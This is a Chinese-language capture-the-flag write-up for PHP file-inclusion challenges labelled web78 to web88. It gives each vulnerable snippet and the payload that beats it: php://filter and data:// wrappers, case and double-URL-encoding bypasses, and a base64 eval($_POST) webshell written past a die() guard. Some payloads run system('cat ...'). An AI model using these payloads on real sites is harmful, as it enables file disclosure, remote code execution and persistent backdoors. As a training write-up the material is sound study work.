web 78
if(isset($_GET['file'])){
$file = $_GET['file'];
include($file);
}else{
highlight_file(__FILE__);
}
文件包含伪协议,没有过滤。
?file=php://filter/read=convert.base64-encode/resource=flag.php
拿到flag的base64编码,直接去解码。
web 79
if(isset($_GET['file'])){
$file = $_GET['file'];
$file = str_replace("php", "???", $file);
include($file);
}else{
highlight_file(__FILE__);
}
这里过滤了php,将“php”替换成“???”,这里可以用data协议
?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs+
然后直接查看源代码,拿到flag。
web80-web81
if(isset($_GET['file'])){
$file = $_GET['file'];
$file = str_replace("php", "???", $file);
$file = str_replace("data", "???", $file);
include($file);
}else{
highlight_file(__FILE__);
}
抓包,进行大小写绕过。
然后直接查看flag
web82-web86
在这里插入代码片
web87
if(isset($_GET['file'])){
$file = $_GET['file'];
$content = $_POST['content'];
$file = str_replace("php", "???", $file);
$file = str_replace("data", "???", $file);
$file = str_replace(":", "???", $file);
$file = str_replace(".", "???", $file);
file_put_contents(urldecode($file), "<?php die('大佬别秀了');?>".$content);
}else{
highlight_file(__FILE__);
}
这里可以看到有die函数,需要对url二次编码绕过。
php://filter/write=convert.base64decode/resource=123.php
将上面的代码进行二次编码,得到
%25%37%30%25%36%38%25%37%30%25%33%61%25%32%66%25%32%66%25%36%36%25%36%39%25%36%63%25%37%34%25%36%35%25%37%32%25%32%66%25%37%37%25%37%32%25%36%39%25%37%34%25%36%35%25%33%64%25%36%33%25%36%66%25%36%65%25%37%36%25%36%35%25%37%32%25%37%34%25%32%65%25%36%32%25%36%31%25%37%33%25%36%35%25%33%36%25%33%34%25%32%64%25%36%34%25%36%35%25%36%33%25%36%66%25%36%34%25%36%35%25%32%66%25%37%32%25%36%35%25%37%33%25%36%66%25%37%35%25%37%32%25%36%33%25%36%35%25%33%64%25%33%31%25%33%32%25%33%33%25%32%65%25%37%30%25%36%38%25%37%30
将"<?php eval($_POST[1]); ?>"进行base64加密得到PD9waHAgZXZhbCgkX1BPU1RbMV0pOyA/Pg==
但PD9waHAgZXZhbCgkX1BPU1RbMV0pOyA/Pg==前面要加上两个a,因为base64算法解码时是4个byte一组,所以给他增加2个“a”一共8个字符。这样,"phpdie"被正常解码,而后面我们传入的123.php的base64内容也被正常解码
然后查看文件,发现了flag
直接cat打开flag。
web88
if(isset($_GET['file'])){
$file = $_GET['file'];
if(preg_match("/php|\~|\!|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\-|\_|\+|\=|\./i", $file)){
die("error");
}
include($file);
}else{
highlight_file(__FILE__);
}
可以发现,php黑名单没有过滤";",所以可以用data协议
将 <?php system('ls');?>进行base64加密,有因为php过滤了"=",所以要将加密的内容中等号删除IDw/cGhwIHN5c3RlbSgnbHMnKTs/Pg==
得到IDw/cGhwIHN5c3RlbSgnbHMnKTs/Pg
然后发现了flag
<?php system('cat fl0g.php');?>
base64加密IDw/cGhwIHN5c3RlbSgnY2F0IGZsMGcucGhwJyk7Pz4=
强调等号IDw/cGhwIHN5c3RlbSgnY2F0IGZsMGcucGhwJyk7Pz4